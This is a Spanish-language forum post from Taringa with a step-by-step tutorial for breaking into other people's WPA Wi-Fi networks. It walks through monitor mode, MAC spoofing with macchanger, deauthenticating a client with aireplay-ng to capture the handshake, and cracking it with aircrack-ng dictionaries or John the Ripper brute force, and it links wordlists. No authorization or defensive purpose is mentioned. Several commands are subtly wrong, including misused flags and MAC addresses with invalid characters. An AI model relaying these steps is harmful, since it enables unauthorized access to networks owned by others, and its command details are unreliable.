HOla amigos taringueros!!

Como lo prometido es deuda y en mi post anterior de "Hackear red wifi con ubuntu 11.04 (actualizado y corregido)" que dicho sea de paso funciona solo para claves wep, les comente que les traeria este post para hackear redes wifi con encriptación wpa (PSK, TKIP y AES/CCMP).

Pero antes me gustaria explicarles un poco que es la wpa, y bueno wpa es la abreviatura de Wifi Protect Access, y consiste en un mecanismo de control de acceso a una red inalámbrica, pensado con la idea de eliminar las debilidades de WEP. También se le conoce con el nombre de TSN (Transition Security Network).
Para realizar el crackeo de una red inalambrica con seguridad WPA habilitada tendremos que capturar una clave llamada Handshake, a través de ella nos será posible realizar el crackeo tanto con diccionarios o con bruteforce.

Y para no perder mas el tiempo procedere a explicarles como hacerlo, para esto es conveniente que ya hayan trabajado antes con encriptaciones wep, que tengan instalado y corregido su aircrack-ng (solo para ubuntu 10.10 y 11.04), de lo contrario les recomiendo visiten mi post anterior, para que puedan continuar!!

Aquii el link!!
http://www.taringa.net/posts/linux/10561177/Hackear-red-wifi-con-ubuntu-11_04-_actualizado-y-corregido_.html
o
http://www.linkexterno.com/z7VbcU

Despues de esto ya les sera facil seguir los siguientes pasos!!!

Paso 0!
Antes que nada en cada terminal que usemos debes de estar logeado como superusuario solo debes teclear
sudo su
y despues tu contraseña (nota, cuando ingreses tu contraseña los caracteres no apareceran!! pero no t preocupes todo va bn).

Paso 1!
airmon-ng start wlan0

Paso 2!
airmon-ng start mon0

Paso 3!
ifconfig mon0 down
macchanger -m 00:11:22:33:44:55 mon0

Paso 4!
ifconfig mon0 up

Paso 5!
airodump-ng mon0

Paso 6!
Identificar las redes inalámbricas disponibles así como las MAC y canales de las
mismas: tomamos la que queremos hakear, ejemplo
ESSID: INFINITUM1111 BSSID= 23:S4:23:44:5F:T4 Chanel: 6 Station: Está en la segunda linea, hay una columna llamada Station (00:11:22:33:44:55) debe de indicar el mismo BSSID de la red que queremos atacar en mi ejemplo sera Station=23:S4:23:44:5F:T4

Presionamos Ctrl+C


Paso 7!
airodump-ng -c (canal de la red CH) -w (nombre con el que queremos guardar el archivo) --bssid (direccion mac del modem seleccionado) mon0
ejemplo
airodump-ng -c 6 -w contraseña --bssid 23:S4:23:44:5F:T4 mon0

Y como vemos hasta aqui hemos procedido como en el caso de las claves wep!!

Paso 8!
ABRIMOS UNA NUEVA TERMINAL!!
Aqui procederemos a des-auntenticar para obtener el handshake!!
aireplay-ng --deauth 1 -a [BSSID] -c mon0
ejemplo
aireplay-ng --deauth 1 -a 23:S4:23:44:5F:T4 -c 23:S4:23:44:5F:T4 mon0
Regresamos a la primera terminal y vermos en la esquina superior derecha algo asi
WPA handshake: [00:11:22:33:44:55]
En mi caso fue
WPA handshake: [23:S4:23:44:5F:T4]


Paso 9!
Abrimos una nueva terminal o pestaña!!
Buscamos por la red, descargamos un buen diccionario y corremos:
aircrack-ng (nombre del archivo este lo pusimos en el paso numero 7).cap [Ruta diccionario] -w
ejemplo
aircrack-ng contraseña-01.cap -z [la ruta de donde hayas guardado tu diccionario...desktop/dic.txt] (ojo hay que agregar el -01.cap al nombre del archivo elegido en el paso 7!!)
Y obtendremos la clave, dependiendo que tan larga y complicada esté o que tan bueno esté el diccionario.

Esto es utilizando diccionario, pero tambien podemos utilizar la fuerza bruta hechando mano de John The Ripper.
Para instalarlo escribimos:
sudo apt-get install john
Para hackear la red lo utilizamos como sigue:
john -incremental=all --stdout | aircrack-ng -w - -e [ESSID nombre de la red] -a 2 (nombre del archivo este lo pusimos en el paso numero 7).cap
ejemplo
john -incremental=all --stdout | aircrack-ng -w - -e infinitum1111 -a 2 contraseña-01.cap

Paso 10!
Abrimos la ultima terminal!
aircrack-ng -z (nombre del archivo este lo pusimos en el paso numero 7).cap
Y listo de cualquiera de las dos formas obtendras la contraseña!!!

En mi particular punto de vista les recomiendo que utilizen diccionarios ya que John puede tardar desde unos minutos hasta semanas!!
Si no cuentas con diccionarios aqui te dejo algunos links, te recomiendo los descargues todos y despues los unas, para que te sea mas facil y rapido hackear esa wpa tan tediosa!!

Aqui te dejo los links para que descargues los mejores diccionarios, bueno al menos los que a mi me funcionan, recuerda descargalos todos y unelos para evitar ingresarlos de 1 x 1!!
*http://www.linkexterno.com/lOrGVQ
*http://www.linkexterno.com/atbypO
*http://www.linkexterno.com/KSIqbJ
*http://www.linkexterno.com/5XQ3G7
*http://www.linkexterno.com/u1B6kP
*http://www.linkexterno.com/dVvmtQ
*http://www.linkexterno.com/8Sgi8A
*http://www.linkexterno.com/vdM6nj
*http://www.linkexterno.com/BowFfX
*http://www.linkexterno.com/cmHGbv
*http://www.linkexterno.com/osgTd3
*http://www.linkexterno.com/1xF1Fu
*http://www.linkexterno.com/B0sX2O
*http://www.linkexterno.com/sOxzbu

Recuerda lo mas importante para hackear una wpa es la paciencia, ya que es un poco mas dificil que hackear una wep!!
Suerte amigos y comenten cualquier duda o error en mi post, les deseo de antemano que tengan suerte con las wpa!!
Si les sirve dejen puntos!! jeje!!!

Y no se olviden de seguir mis demas post que al igual que este funcionan y son faciles de entender!!!